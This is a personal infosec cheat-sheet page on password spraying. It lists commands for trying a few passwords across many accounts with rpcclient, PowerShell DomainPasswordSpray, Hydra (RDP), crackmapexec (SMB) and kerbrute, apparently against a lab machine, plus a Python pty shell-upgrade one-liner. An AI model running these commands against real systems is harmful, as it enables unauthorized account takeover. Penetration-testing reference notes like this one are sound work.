akde/infosec

Information security is ultimately about managing risk

Password spraying

,

Pass­word spray­ing: Try a few pass­words against a large set of users.

Manual

for u in Administrator Guest krbtgt DefaultAccount ryan marko sunita abigail marcus sally fred angela felicia gustavo ulf stevie claire paulo steve annette annika per claude melanie zach simon naoki; do rpcclient -W MEGABANK -U $u 10.10.10.169; done;

With Pow­er­Shell

Down­load Domain­Pass­word­Spray and upload it to the tar­get. Then execute

PS> Invoke-DomainPasswordSpray -Password Test123

With Hydra

hydra -L /usr/share/wordlists/dirb/others/names.txt -p "RetrievedSuperSecurePassword" rdp://$target

With crackmapexec (against SMB shares)

  1. Cre­ate a list of users, e.g. users.txt:
    tom
    jerry
  2. Exe­cute crackmapex­ec with one pass­word:
    crackmapexec smb $target -u users.txt -p 'Password123' --continue-on-success [-d ad.dom]

With kerbute

On Lin­ux:

python kerbrute.py …

On Win­dows, down­load it on Github.

  1. Cre­ate a list of users, e.g. users.txt:
    tom
    jerry
  2. Exe­cute ker­brute with one pass­word:
    kerbrute_windows_amd64.exe passwordspray -d dom.ain users.txt "Pass123"

Tools

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';